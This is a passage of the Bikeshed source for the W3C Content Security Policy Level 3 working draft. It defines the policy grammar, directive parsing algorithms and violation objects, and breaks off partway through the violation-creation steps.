index.bs

<h1>Content Security Policy Level 3</h1>
<pre class="metadata">
Status: WD
ED: https://w3c.github.io/webappsec-csp/
TR: https://www.w3.org/TR/CSP3/
Shortname: CSP3
Level: None
Issue Tracking: Github https://github.com/w3c/webappsec-csp/issues/new
Editor: Mike West 56384, Google Inc., mkwst@google.com
Editor: Antonio Sartori 124875, Google Inc., antoniosartori@google.com
Group: webappsec
Abstract:
  This document defines a mechanism by which web developers can control the
  resources which a particular page can fetch or execute, as well as a number
  of security-relevant policy decisions.
Indent: 2
Version History: https://github.com/w3c/webappsec-csp/commits/main/index.src.html
Boilerplate: feedback-header off
!Participate: <a href="https://github.com/w3c/webappsec-csp/issues/new">File an issue</a> (<a href="https://github.com/w3c/webappsec-csp/issues">open issues</a>)
!Tests: <a href=https://github.com/web-platform-tests/wpt/tree/master/content-security-policy>web-platform-tests content-security-policy/</a> (<a href=https://github.com/web-platform-tests/wpt/labels/content-security-policy>ongoing work</a>)
Markup Shorthands: css off, markdown on
At Risk: The [[#is-element-nonceable]] algorithm.
</pre>
<pre class="link-defaults">
spec:dom; type:interface; text:Document
spec:html
  type: dfn
    text: fallback base url
    text: duplicate-attribute
    text: parse error; for: /
  type: element
    text: a
    text: link
    text: script
    text: style
  type: element-attr
    text: ping
  type:interface
    text:SharedWorker
spec:fetch
  type: dfn
    text: main fetch
    text: http-network fetch
    text: http fetch
    text: response; for: /
spec:url
  type: dfn
    text: default port
    text: base url
    text: domain
    text: url; for: /
  type:interface;
    text:URL
spec:cssom
  type: dfn
    text: insert a css rule
    text: parse a css declaration block
    text: parse a css rule
    text: parse a group of selectors
spec:css-cascade
  type: at-rule
    text: @import
spec:infra;
  type:dfn;
    text:ascii case-insensitive
    text:string; for: /
    text:list; for: /
    text:set; for: /
    text:append; for: set
    text:empty; for: set
    text:strictly split a string
    text:starts with; for:string
</pre>
<pre class="anchors">
spec: RFC6454; urlPrefix: https://tools.ietf.org/html/rfc6454
  type: dfn
    text: the same; url: section-5
spec: ECMA262; urlPrefix: https://tc39.github.io/ecma262
  type: dfn
    text: realm
  type: method
    text: HostEnsureCanCompileStrings(); url: sec-hostensurecancompilestrings
    text: eval(); url: sec-eval-x
    text: Function(); url: sec-function-objects
spec: MIX; urlPrefix: https://www.w3.org/TR/mixed-content/
  type: dfn; text: block-all-mixed-content
spec: RFC3986; urlPrefix: https://tools.ietf.org/html/rfc3986
  type: grammar
    text: path-absolute; url: section-3.3
    text: scheme; url: section-3.1
    text: IPv4address; url: section-3.2.2
    text: uri-reference; url: section-4.1
spec: RFC4648; urlPrefix: https://tools.ietf.org/html/rfc4648
  type: dfn
    text: base64 encoding; url: section-4
    text: base64url encoding; url: section-5
spec: RFC5234; urlPrefix: https://tools.ietf.org/html/rfc5234
  type: grammar
    text: ALPHA; url: appendix-B.1
    text: DIGIT; url: appendix-B.1
    text: VCHAR; url: appendix-B.1
spec: RFC5890; urlPrefix: https://tools.ietf.org/html/rfc5890
  type: dfn
    text: label; url: section-2.2
spec: RFC9110; urlPrefix: https://tools.ietf.org/html/rfc9110
  type: grammar
    text: OWS; url: section-5.6.3
    text: token; url: section-5.6.2
  type: dfn
    url: section-3.2
      text: resource representation
      text: representation

spec: REPORTING; urlPrefix: https://w3c.github.io/reporting/
  type: dfn
    text: queue report; url: queue-report
    text: report type
    text: visible to reportingobservers

spec: SHA2; urlPrefix: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf
  type: dfn
    text: SHA-256; url: #
    text: SHA-384; url: #
    text: SHA-512; url: #

spec: HTML; urlPrefix: https://html.spec.whatwg.org/
  type: dfn
    for: script
      text: "parser-inserted"
    text: origin; url: concept-origin
    text: content security policy state; url: attr-meta-http-equiv-content-security-policy
    text: create and initialize a new document object; url: initialise-the-document-object
    text: initializing a new Document object; url: initialise-the-document-object
    text: prepare the script element; url: prepare-the-script-element
    text: plugin; url: #plugin
    text: navigable; url: #navigable
  type: attr-value
    for: link/rel; text: prefetch; url: link-type-prefetch
    for: link/rel; text: preconnect; url: link-type-preconnect

spec: INFRA; urlPrefix: https://infra.spec.whatwg.org/
  type: grammar
    text: ASCII whitespace; url: ascii-whitespace
    text: INFRA; url: #

spec: WebAssembly-js-api; urlPrefix: https://webassembly.github.io/spec/js-api/
  type: method
    text: new WebAssembly.Module(); url: #dom-module-module
    text: WebAssembly.compile(); url: #dom-webassembly-compile
    text: WebAssembly.instantiate(); url: #dom-webassembly-instantiate
  type: exception
    text: WebAssembly.CompileError; url: #exceptiondef-compileerror

spec: WebAssembly-web-api; urlPrefix: https://webassembly.github.io/spec/web-api/
  type: method
    text: WebAssembly.compileStreaming(); url: #dom-webassembly-compilestreaming
    text: WebAssembly.instantiateStreaming(); url: #dom-webassembly-instantiatestreaming

spec: WebAssembly-js-csp-proposal; urlPrefix: https://webassembly.github.io/content-security-policy/js-api/
  type: method
    text: HostEnsureCanCompileWasmBytes(); url:#host-ensure-can-compile-wasm-bytes

spec: WebRTC; urlPrefix: https://www.w3.org/TR/webrtc/
  type:dfn
    text: administratively-prohibited; url: #dfn-administratively-prohibited

</pre>
<pre class="biblio">
{
  "HTML-DESIGN": {
    "authors": [ "Anne Van Kesteren", "Maciej Stachowiak" ],
    "href": "https://www.w3.org/TR/html-design-principles/",
    "title": "HTML Design Principles",
    "publisher": "W3C"
  },
  "ECMA262": {
    "authors": [ "Brian Terlson", "Allen Wirfs-Brock" ],
    "href": "https://tc39.github.io/ecma262/",
    "title": "ECMAScript® Language Specification",
    "publisher": "ECMA"
  },
  "REPORTING": {
    "href": "https://wicg.github.io/reporting/",
    "title": "Reporting API",
    "authors": [ "Ilya Gregorik", "Mike West" ]
  },
  "TIMING": {
      "href": "https://owasp.org/www-pdf-archive/HackPra_Allstars-Browser_Timing_Attacks_-_Paul_Stone.pdf",
      "title": "Pixel Perfect Timing Attacks",
      "authors": [ "Paul Stone" ]
  },
  "H5SC3": {
      "href": "https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22",
      "title": "H5SC Minichallenge 3: \"Sh*t, it's CSP!\"",
      "authors": [ "Mario Heiderich" ],
      "publisher": "Cure53"
  },
  "CSS-ABUSE": {
      "href": "https://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html",
      "title": "Generic cross-browser cross-domain theft",
      "authors": [ "Chris Evans" ],
      "date": "28 December 2009"
  },
  "FILEDESCRIPTOR-2015": {
      "href": "https://blog.innerht.ml/csp-2015/#danglingmarkupinjection",
      "title": "CSP 2015",
      "authors": [ "filedescriptor" ],
      "date": "23 November 2015"
  },
  "LONG-LIVE-CSP": {
      "href": "https://dl.acm.org/doi/10.1145/2976749.2978363",
      "title": "CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy",
      "authors": [ "Lukas Weichselbaum", "Michele Spagnuolo", "Sebastian Lekies", "Artur Janc" ],
      "date": "24 October 2016"
  },
  "WEBDEV-STRICTCSP": {
      "href": "https://web.dev/strict-csp/",
      "title": "Mitigate cross-site scripting (XSS) with a strict Content Security Policy (CSP)",
      "authors": [ "Lukas Weichselbaum" ],
      "date": "15 March 2021"
  }
}
</pre>
<style>
  ul.toc ul ul ul {
    margin: 0 0 0 2em;
  }
  ul.toc ul ul ul span.secno {
    margin-left: -9em;
  }

  a[href^="http:"]:after {
    color: red;
    content: "\1F512";  /* A lock symbol: 🔓. */
  }

  .wip {
    margin: 1em auto;

    background: #FCFAEE;
    border: 0.5em;
    border-left-style: solid;
    border-color: #E0CB52;
    padding: 0.5em;
  }

  .wip::before {
    content: "Work In Progress: ";
    display: block;
    color: #827017;
  }
  section.wip {
    padding-left: 2em;
  }

</style>
<!--
████ ██    ██ ████████ ████████   ███████
 ██  ███   ██    ██    ██     ██ ██     ██
 ██  ████  ██    ██    ██     ██ ██     ██
 ██  ██ ██ ██    ██    ████████  ██     ██
 ██  ██  ████    ██    ██   ██   ██     ██
 ██  ██   ███    ██    ██    ██  ██     ██
████ ██    ██    ██    ██     ██  ███████
-->
<section>
  <h2 id="intro">Introduction</h2>

  <em>This section is not normative.</em>

  This document defines <dfn export>Content Security Policy</dfn> (CSP), a tool
  which developers can use to lock down their applications in various ways,
  mitigating the risk of content injection vulnerabilities such as cross-site scripting, and
  reducing the privilege with which their applications execute.

  CSP is not intended as a first line of defense against content injection
  vulnerabilities. Instead, CSP is best used as defense-in-depth. It reduces
  the harm that a malicious injection can cause, but it is not a replacement for
  careful input validation and output encoding.

  This document is an iteration on Content Security Policy Level 2, with the
  goal of more clearly explaining the interactions between CSP, HTML, and Fetch
  on the one hand, and providing clear hooks for modular extensibility on the
  other. Ideally, this will form a stable core upon which we can build new
  functionality.

  <h3 id="examples">Examples</h3>

  <h4 id="example-basic">Control Execution</h4>

  <div class="example">
    MegaCorp Inc's developers want to protect themselves against cross-site
    scripting attacks. They can mitigate the risk of script injection by
    ensuring that their trusted CDN is the only origin from which script can
    load and execute. Moreover, they wish to ensure that no plugins can
    execute in their pages' contexts. The following policy has that effect:

    <pre>
      <a http-header>Content-Security-Policy</a>: script-src https://cdn.example.com/scripts/; object-src 'none'
    </pre>
  </div>

  <h3 id="goals">Goals</h3>

  Content Security Policy aims to do to a few related things:

  1.  Mitigate the risk of content-injection attacks by giving developers
      fairly granular control over

      *   The resources which can be requested (and subsequently embedded or
          executed) on behalf of a specific {{Document}} or {{Worker}}

      *   The execution of inline script

      *   Dynamic code execution (via {{eval()}} and similar constructs)

      *   The application of inline style

  2.  Mitigate the risk of attacks which require a resource to be embedded
      in a malicious context (the "Pixel Perfect" attack described in
      [[TIMING]], for example) by giving developers granular control over the
      origins which can embed a given resource.

  3.  Provide a policy framework which allows developers to reduce the privilege
      of their applications.

  4.  Provide a reporting mechanism which allows developers to detect flaws
      being exploited in the wild.

  <h3 id="changes-from-level-2">Changes from Level 2</h3>

  This document describes an evolution of the Content Security Policy Level 2
  specification [[CSP2]]. The following is a high-level overview of the changes:

  1.  The specification has been rewritten from the ground up in terms of the
      [[FETCH]] specification, which should make it simpler to integrate CSP's
      requirements and restrictions with other specifications (and with
      Service Workers in particular).

  2.  The `child-src` model has been substantially altered:

      1. The `frame-src` directive, which was deprecated in CSP Level
         2, has been undeprecated, but continues to defer to `child-src` if
         not present (which defers to `default-src` in turn).

      2. A `worker-src` directive has been added, deferring to `child-src`
         if not present (which likewise defers to `script-src` and
         eventually `default-src`).

  3.  The URL matching algorithm now treats insecure schemes and ports as
      matching their secure variants. That is, the source expression
      `http://example.com:80` will match both `http://example.com:80` and
      `https://example.com:443`.

      Likewise, `'self'` now matches `https:` and `wss:` variants of the page's
      origin, even on pages whose scheme is `http`.

  4.  Violation reports generated from inline script or style will now report
      "`inline`" as the blocked resource. Likewise, blocked `eval()` execution
      will report "`eval`" as the blocked resource.

  5.  The `manifest-src` directive has been added.

  6.  The `report-uri` directive is deprecated in favor of the new `report-to`
      directive, which relies on [[REPORTING]] as infrastructure.

  7.  The `'strict-dynamic'` source expression will now allow script which
      executes on a page to load more script via non-<a>"parser-inserted"</a>
      <{script}> elements. Details are in [[#strict-dynamic-usage]].

  8.  The `'unsafe-hashes'` source expression will now allow event
      handlers, style attributes and `javascript:` navigation targets to match
      hashes. Details in [[#unsafe-hashes-usage]].

  9.  The <a>source expression</a> matching has been changed to require explicit presence
      of any non-<a>HTTP(S) scheme</a>, rather than <a>local scheme</a>,
      unless that non-<a>HTTP(S) scheme</a> is the same as the scheme of protected resource,
      as described in [[#match-url-to-source-expression]].

  10. Hash-based source expressions may now match external scripts if the
      <{script}> element that triggers the request specifies a set of integrity
      metadata which is listed in the current policy. Details in
      [[#external-hash]].

  11. Reports generated for inline violations will contain a <a for="violation">sample</a>
      attribute if the relevant directive contains the <a grammar>`'report-sample'`</a>
      expression.
</section>

<!-- Big Text: Framework -->
<section>
  <h2 id="framework">Framework</h2>

  <h3 id="framework-infrastructure">Infrastructure</h3>

  This document uses ABNF grammar to specify syntax, as defined in [[!RFC5234]]. It also relies on
  the `#rule` ABNF extension defined in
  <a href="https://tools.ietf.org/html/rfc9110#section-5.6.1">Section 5.6.1</a> of [[!RFC9110]],
  with the modification that <a grammar>OWS</a> is replaced with
  <a grammar>optional-ascii-whitespace</a>. That is, the `#rule` used in this
  document is defined as:

  <pre>
    1#element => element *( <a grammar>optional-ascii-whitespace</a> "," <a grammar>optional-ascii-whitespace</a> element )
  </pre>

  and for n >= 1 and m > 1:

  <pre>
    &lt;n&gt;#&lt;m&gt;element => element &lt;n-1&gt;*&lt;m-1&gt;( <a grammar>optional-ascii-whitespace</a> "," <a grammar>optional-ascii-whitespace</a> element )
  </pre>

  This document depends on the Infra Standard for a number of foundational concepts used in its
  algorithms and prose [[!INFRA]].

  The following definitions are used to improve readability of other definitions in this document.
  <pre dfn-type="grammar" link-type="grammar">
    <dfn>optional-ascii-whitespace</dfn> = *( %x09 / %x0A / %x0C / %x0D / %x20 )
    <dfn>required-ascii-whitespace</dfn> = 1*( %x09 / %x0A / %x0C / %x0D / %x20 )
    ; These productions match the definition of <a>ASCII whitespace</a> from the <a>INFRA</a> standard.
  </pre>

  <h3 id="framework-policy">Policies</h3>

  A <dfn export lt="content security policy object" local-lt="policy">policy</dfn> defines allowed
  and restricted behaviors, and may be applied to a {{Document}}, {{WorkerGlobalScope}}, or
  {{WorkletGlobalScope}}.

  Each policy has an associated <dfn for="policy" export>directive set</dfn>, which is an <a>ordered
  set</a> of <a>directives</a> that define the policy's implications when applied.

  Each policy has an associated <dfn for="policy" export>disposition</dfn>, which is either
  "`enforce`" or "`report`".

  Each policy has an associated <dfn for="policy" export>source</dfn>, which is either "`header`"
  or "`meta`".

  Each policy has an associated <dfn for="policy" export>self-origin</dfn>, which
  is an <a>origin</a> that is used when matching the <a grammar>`'self'`</a> keyword.

  Note: This is needed to facilitate the <a grammar>`'self'`</a> checks of
  <a>local scheme</a> documents/workers that have inherited their policy but
  have an <a>opaque origin</a>. Most of the time this will simply be the
  <a>environment settings object</a>'s [=environment settings object/origin=].

  Multiple [=/policies=] can be applied to a single resource, and are collected into a [=list=] of
  [=/policies=] known as a <dfn export>CSP list</dfn>.

  A [=/CSP list=] <dfn export>contains a header-delivered Content Security Policy</dfn> if it
  [=list/contains=] a [=/policy=] whose [=policy/source=] is "`header`".

  A <dfn export>serialized CSP</dfn> is an <a>ASCII string</a> consisting of a semicolon-delimited
  series of <a>serialized directives</a>, adhering to the following ABNF grammar [[!RFC5234]]:

  <pre dfn-type="grammar" link-type="grammar">
    <dfn>serialized-policy</dfn> =
        <a>serialized-directive</a> *( <a>optional-ascii-whitespace</a> ";" [ <a>optional-ascii-whitespace</a> <a>serialized-directive</a> ] )
  </pre>

  A <dfn export>serialized CSP list</dfn> is an [=ASCII string=] consisting of a comma-delimited
  series of [=serialized CSPs=], adhering to the following ABNF grammar [[!RFC5234]]:

  <pre dfn-type="grammar" link-type="grammar">
    <dfn>serialized-policy-list</dfn> = 1#<a>serialized-policy</a>
                        ; The '#' rule is the one defined in section 5.6.1 of RFC 9110
                        ; but it incorporates the modifications specified
                        ; in section 2.1 of this document.
  </pre>

  <h4 id="parse-serialized-policy" algorithm>
    Parse a serialized CSP
  </h4>

  To <dfn abstract-op>parse a serialized CSP</dfn>, given a [=byte sequence=] or
  [=string=] |serialized|, a [=policy/source=] |source|, and a [=policy/disposition=]
  |disposition|, execute the following steps.

  This algorithm returns a [=Content Security Policy object=]. If |serialized| could not be
  parsed, the object's [=policy/directive set=] will be empty.

  <ol class="algorithm">
    1.  If |serialized| is a [=byte sequence=], then set |serialized| to be the result of
        [=isomorphic decoding=] |serialized|.
        
    2.  Let |policy| be a new [=/policy=] with an empty [=policy/directive set=], a [=policy/source=]
        of |source|, and a [=policy/disposition=] of |disposition|.

    3.  <a for=list>For each</a> |token| returned by [=strictly split a string|strictly splitting=] |serialized| on
        the U+003B SEMICOLON character (`;`):

        1.  [=Strip leading and trailing ASCII whitespace=] from |token|.

        2.  If |token| is an empty string, or if |token| is not an [=ASCII string=], [=iteration/continue=].

        3.  Let |directive name| be the result of [=collecting a sequence of code points=] from
            |token| which are not [=ASCII whitespace=].

        4.  Set |directive name| to be the result of running <a>ASCII lowercase</a>
            on |directive name|.

            Note: Directive names are case-insensitive, that is: `script-SRC 'none'` and
            `ScRiPt-sRc 'none'` are equivalent.

        5.  If |policy|'s [=policy/directive set=] contains a [=directive=] whose [=directive/name=]
            is |directive name|, [=iteration/continue=].

            Note: In this case, the user agent SHOULD notify developers that a duplicate
            directive was ignored. A console warning might be appropriate, for example.

        6.  Let |directive value| be the result of
            <a lt="split a string on ASCII whitespace">splitting |token| on
            ASCII whitespace</a>.

        7.  Let |directive| be a new [=directive=] whose [=directive/name=] is |directive name|, and
            [=directive/value=] is |directive value|.

        8.  [=set/append|Append=] |directive| to |policy|'s [=policy/directive set=].

    4.  Return |policy|.
  </ol>

  <h4 id="parse-response-csp" algorithm dfn export>
    Parse |response|'s Content Security Policies
  </h4>

  To <dfn abstract-op>parse a response's Content Security Policies</dfn> given a <a>response</a>
  |response|, execute the following steps.

  This algorithm returns a [=list=] of [=Content Security Policy objects=]. If the policies cannot
  be parsed, the returned list will be empty.

  <ol class="algorithm">
    1.  Let |policies| be an empty [=list=].

    2.  <a for=list>For each</a> |token| returned by [=extracting header list values=] given
        `Content-Security-Policy` and |response|'s [=response/header list=]:

        1.  Let |policy| be the result of
            <a abstract-op lt="parse a serialized CSP">parsing</a> |token|, with a
            [=policy/source=] of "`header`", and a [=policy/disposition=] of "`enforce`".

        2.  If |policy|'s [=policy/directive set=] is not empty, append |policy| to |policies|.

    3.  <a for=list>For each</a> |token| returned by [=extracting header list values=] given
        `Content-Security-Policy-Report-Only` and |response|'s [=response/header list=]:

        1.  Let |policy| be the result of
            <a abstract-op lt="parse a serialized CSP">parsing</a> |token|, with a
            [=policy/source=] of "`header`", and a [=policy/disposition=] of "`report`".

        2.  If |policy|'s [=policy/directive set=] is not empty, append |policy| to |policies|.

    4.  <a for=list>For each</a> |policy| of |policies|:

        1.  Set |policy|'s [=policy/self-origin=] to |response|'s [=response/url=]'s
            [=url/origin=].

    5.  Return |policies|.
  </ol>

  Note: When <a abstract-op lt="parse a response's Content Security Policies">parsing a response's
  Content Security Policies</a>, if the resulting |policies| end up containing at least one item,
  user agents can hold a flag on |policies| and use it to optimize away the [=/contains a
  header-delivered Content Security Policy=] algorithm.

  <h3 id="framework-directives">Directives</h3>

  Each <a for="/">policy</a> contains an <a>ordered set</a> of <dfn export>directives</dfn> (its
  <a for="policy">directive set</a>), each of which controls a specific behavior. The directives
  defined in this document are described in detail in [[#csp-directives]].

  Each <a>directive</a> is a <dfn for="directive" export>name</dfn> /
  <dfn for="directive" export>value</dfn> pair. The <a for="directive">name</a> is a
  non-empty <a>string</a>, and the [=directive/value=] is a <a>set</a> of non-empty <a>strings</a>. The
  [=directive/value=] MAY be <a for="list" lt="is empty">empty</a>.

  A <dfn export>serialized directive</dfn> is an <a>ASCII string</a>, consisting of one or more
  whitespace-delimited tokens, and adhering to the following ABNF [[!RFC5234]]:

  <pre dfn-type="grammar" link-type="grammar">
    <dfn>serialized-directive</dfn> = <a>directive-name</a> [ <a>required-ascii-whitespace</a> <a>directive-value</a> ]
    <dfn>directive-name</dfn>       = 1*( <a>ALPHA</a> / <a>DIGIT</a> / "-" )
    <dfn>directive-value</dfn>      = *( <a>required-ascii-whitespace</a> / ( %x21-%x2B / %x2D-%x3A / %x3C-%x7E ) )
                           ; Directive values may contain whitespace and <a>VCHAR</a> characters,
                           ; excluding ";" and ",". The second half of the definition
                           ; above represents all <a>VCHAR</a> characters (%x21-%x7E)
                           ; without ";" and "," (%x3B and %x2C respectively)

    ; <a>ALPHA</a>, <a>DIGIT</a>, and <a>VCHAR</a> are defined in Appendix B.1 of RFC 5234.
  </pre>

  <a>Directives</a> have a number of associated algorithms:

  1.  A <dfn for="directive" export>pre-request check</dfn>, which takes a
      <a for="/">request</a> and a <a for="/">policy</a> as an argument, and is executed
      during [[#should-block-request]]. This algorithm returns "`Allowed`" unless
      otherwise specified.

  2.  A <dfn for="directive" export>post-request check</dfn>, which takes a
      <a for="/">request</a>, a <a>response</a>, and a <a for="/">policy</a> as arguments,
      and is executed during [[#should-block-response]]. This algorithm returns
      "`Allowed`" unless otherwise specified.

  3.  An <dfn for="directive" export>inline check</dfn>, which takes an {{Element}}, a
      type string, a <a for="/">policy</a>, and a source string as arguments,
      and is executed during [[#should-block-inline]] and during
      [[#should-block-navigation-request]] for `javascript:` requests. This
      algorithm returns "`Allowed`" unless otherwise specified.

  4.  An <dfn for="directive" export>initialization</dfn>, which takes a {{Document}}
      or <a for="/">global object</a> and a <a for="/">policy</a> as arguments. This
      algorithm is executed during [[#run-document-csp-initialization]] and
      [[#run-global-object-csp-initialization]]. Unless otherwise specified, it has no
      effect and it returns "`Allowed`".

  5.  A <dfn for="directive" export>pre-navigation check</dfn>, which takes a
      <a for="/">request</a>, a navigation type string ("`form-submission`"
      or "`other`"), and a <a for="/">policy</a> as arguments, and
      is executed during [[#should-block-navigation-request]]. It returns
      "`Allowed`" unless otherwise specified.

  6.  A <dfn for="directive" export>navigation response check</dfn>, which takes a
      <a for="/">request</a>, a navigation type string ("`form-submission`" or "`other`"),
      a <a>response</a>, a <a>navigable</a>, a check type string ("`source`"
      or "`response`"), and a <a for="/">policy</a> as arguments, and is executed during
      [[#should-block-navigation-response]]. It returns "`Allowed`" unless otherwise specified.

  8.  A <dfn for="directive" export>webrtc pre-connect check</dfn>, which takes a [=/policy=], and
      is executed during [[#should-block-rtc-connection]]. It returns "`Allowed`" unless
      otherwise specified.

  <h4 id="framework-directive-source-list">Source Lists</h4>

  Many <a>directives</a>' [=directive/value=] consist of <dfn export>source lists</dfn>: <a>sets</a>
  of <a>strings</a> which identify content that can be fetched and potentially embedded or
  executed. Each <a>string</a> represents one of the following types of <dfn export>source
  expression</dfn>:

  1.  Keywords such as <a grammar>`'none'`</a> and
      <a grammar>`'self'`</a> (which match nothing and the current
      URL's origin, respectively)

  2.  Serialized URLs such as `https://example.com/path/to/file.js`
      (which matches a specific file) or `https://example.com/`
      (which matches everything on that origin)

  3.  Schemes such as `https:` (which matches any resource having
      the specified scheme)

  4.  Hosts such as `example.com` (which matches any resource on
      the host, regardless of scheme) or `*.example.com` (which
      matches any resource on the host's subdomains (and any of
      its subdomains' subdomains, and so on))

  5.  Nonces such as `'nonce-ch4hvvbHDpv7xCSvXCs3BrNggHdTzxUA'` (which can match
      specific elements on a page)

  6.  Digests such as `'sha256-abcd...'` (which can match specific
      elements on a page)

  A <dfn export>serialized source list</dfn> is an <a>ASCII string</a>, consisting of a
  whitespace-delimited series of <a>source expressions</a>, adhering to the following ABNF grammar
  [[!RFC5234]]:

  <pre dfn-type="grammar" link-type="grammar">
    <dfn>serialized-source-list</dfn> = ( <a>source-expression</a> *( <a>required-ascii-whitespace</a> <a>source-expression</a> ) ) / "<dfn>'none'</dfn>"
    <dfn>source-expression</dfn>      = <a>scheme-source</a> / <a>host-source</a> / <a>keyword-source</a>
                             / <a>nonce-source</a> / <a>hash-source</a>

    ; Schemes: "https:" / "custom-scheme:" / "another.custom-scheme:"
    <dfn export>scheme-source</dfn> = <a>scheme-part</a> ":"

    ; Hosts: "example.com" / "*.example.com" / "https://*.example.com:12/path/to/file.js"
    <dfn export>host-source</dfn> = [ <a>scheme-part</a> "://" ] <a>host-part</a> [ ":" <a>port-part</a> ] [ <a>path-part</a> ]
    <dfn>scheme-part</dfn> = <a>scheme</a>
                  ; <a>scheme</a> is defined in section 3.1 of RFC 3986.
    <dfn>host-part</dfn>   = "*" / [ "*." ] 1*<a>host-char</a> *( "." 1*<a>host-char</a> ) [ "." ]
    <dfn>host-char</dfn>   = <a>ALPHA</a> / <a>DIGIT</a> / "-"
    <dfn>port-part</dfn>   = 1*<a>DIGIT</a> / "*"
    <dfn>path-part</dfn>   = <a>path-absolute</a> (but not including ";" or ",")
                  ; <a>path-absolute</a> is defined in section 3.3 of RFC 3986.

    ; Keywords:
    <dfn>keyword-source</dfn> = "<dfn>'self'</dfn>" / "<dfn>'unsafe-inline'</dfn>" / "<dfn>'unsafe-eval'</dfn>"
                     / "<dfn>'strict-dynamic'</dfn>" / "<dfn>'unsafe-hashes'</dfn>" /
                     / "<dfn>'report-sample'</dfn>" / "<dfn>'unsafe-allow-redirects'</dfn>"
                     / "<dfn>'wasm-unsafe-eval'</dfn>"

    ISSUE: Bikeshed `unsafe-allow-redirects`.

    ; Nonces: 'nonce-[nonce goes here]'
    <dfn>nonce-source</dfn>  = "'nonce-" <a>base64-value</a> "'"
    <dfn>base64-value</dfn>  = 1*( <a>ALPHA</a> / <a>DIGIT</a> / "+" / "/" / "-" / "_" )*2( "=" )

    ; Digests: 'sha256-[digest goes here]'
    <dfn>hash-source</dfn>    = "'" <a>hash-algorithm</a> "-" <a>base64-value</a> "'"
    <dfn>hash-algorithm</dfn> = "sha256" / "sha384" / "sha512"
  </pre>

  The <a grammar>host-char</a> production intentionally contains only ASCII
  characters; internationalized domain names cannot be entered directly as part
  of a <a>serialized CSP</a>, but instead MUST be Punycode-encoded
  [[!RFC3492]]. For example, the domain `üüüüüü.de` MUST be represented as
  `xn--tdaaaaaa.de`.

  Note: Though IP address do match the grammar above, only
  `127.0.0.1` will actually match a URL when used in a source
  expression (see [[#match-url-to-source-list]] for details). The security
  properties of IP addresses are suspect, and authors ought to prefer hostnames
  whenever possible.

  Note: The <a grammar>base64-value</a> grammar allows both [=base64 encoding|base64=] and
  [=base64url encoding|base64url=] encoding. These encodings are treated as equivalant when
  processing <a grammar>hash-source</a> values. Nonces, however, are strict string matches:
  we use the <a grammar>base64-value</a> grammar to limit the characters available, and
  reduce the complexity for the server-side operator (encodings, etc), but the user agent
  doesn't actually care about any underlying value, nor does it do any decoding of the
  <a grammar>nonce-source</a> value.

  <h3 id="framework-violation">Violations</h3>

  A <dfn export>violation</dfn> represents an action or resource which goes against the
  set of <a for="/">policy</a> objects associated with a <a for="/">global object</a>.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-global-object" export>global object</dfn>, which
  is the <a for="/">global object</a> whose <a for="/">policy</a> has been violated.

  Each <a>violation</a> has a <dfn for="violation" id="violation-url" export>url</dfn>
  which is its <a for="violation">global object</a>'s {{URL}}.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-status" export>status</dfn> which is a
  non-negative integer representing the HTTP status code of the resource for
  which the global object was instantiated.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-resource" export>resource</dfn>, which is
  either null, "`inline`", "`eval`", "`wasm-eval`", "`trusted-types-policy`", "`trusted-types-sink`" or a {{URL}}.
  It represents the resource which violated the policy.

  Note: The value null for a <a>violation</a>'s <a
  for="violation">resource</a> is only allowed while the <a>violation</a> is
  being populated. By the time the <a>violation</a> is reported and its <a
  for="violation">resource</a> is used for
  [[#obtain-violation-blocked-uri|obtaining the blocked URI]], the
  <a>violation</a>'s <a for="violation">resource</a> should be populated with a
  {{URL}} or one of the allowed strings.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-referrer" export>referrer</dfn>, which is either
  null, or a {{URL}}. It represents the referrer of the resource whose policy
  was violated.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-policy" export>policy</dfn>, which is the
  <a for="/">policy</a> that has been violated.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-disposition" export>disposition</dfn>, which is the
  <a for="policy">disposition</a> of the <a for="/">policy</a> that has been violated.

  Each <a>violation</a> has an
  <dfn for="violation" id="violation-effective-directive" export>effective directive</dfn>
  which is a non-empty string representing the <a>directive</a> whose
  enforcement caused the violation.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-source-file" export>source file</dfn>, which is
  either null or a {{URL}}.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-line-number" export>line number</dfn>, which is
  a non-negative integer.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-column-number" export>column number</dfn>, which
  is a non-negative integer.

  Each <a>violation</a> has a
  <dfn for="violation" id="violation-element" export>element</dfn>, which is either
  null or an element.

  Each <a>violation</a> has a <dfn for="violation" id="violation-sample" export>sample</dfn>,
  which is a string. It is the empty string unless otherwise specified.

  Note: A <a>violation</a>'s <a for="violation">sample</a> will be populated with the first 40
  characters of an inline script, event handler, or style that caused an violation. Violations
  which stem from an external file will not include a sample in the violation report.

  <h4 id="create-violation-for-global" algorithm>
    Create a violation object for |global|, |policy|, and |directive|
  </h4>

  Given a <a for="/">global object</a> |global|, a <a for="/">policy</a> |policy|, and a
  <a>string</a> |directive|, the following algorithm creates a new <a>violation</a>
  object, and populates it with an initial set of data:

  1.  Let |violation| be a new <a>violation</a> whose <a for="violation">global
      object</a> is |global|, <a for="violation">policy</a> is |policy|,
      <a for="violation">effective directive</a> is |directive|, and
      <a for="violation">resource</a> is null.

  2.  If the user agent is currently executing script, and can extract a source
      file's URL, line number, and column number from the |global|, set
      |violation|'s <a for="violation">source file</a>, <a for="violation">line
      number</a>, and <a for="violation">column number</a> accordingly.

      ISSUE: Is this kind of thing specified anywhere? I didn't see anything
      that looked useful in [[ECMA262]].

      Note: User agents need to ensure that the [=violation/source file=] is the URL requested by
      the page, pre-redirects. If that's not possible, user agents need to strip the URL down to an
      origin to avoid unintentional leakage.

  3.  If |global| is a {{Window}} object, set |violation|'s
      <a for="violation">referrer</a> to |global|'s {{Window/document}}'s
      {{Document/referrer}}.

  4.  Set |violation|'s <a for="violation">status</a> to the HTTP status code
      for the resource associated with |violation|'s <a for="violation">global
      object</a>.

      ISSUE: How, exactly, do we get the status code? We don't actually store it
      anywhere.

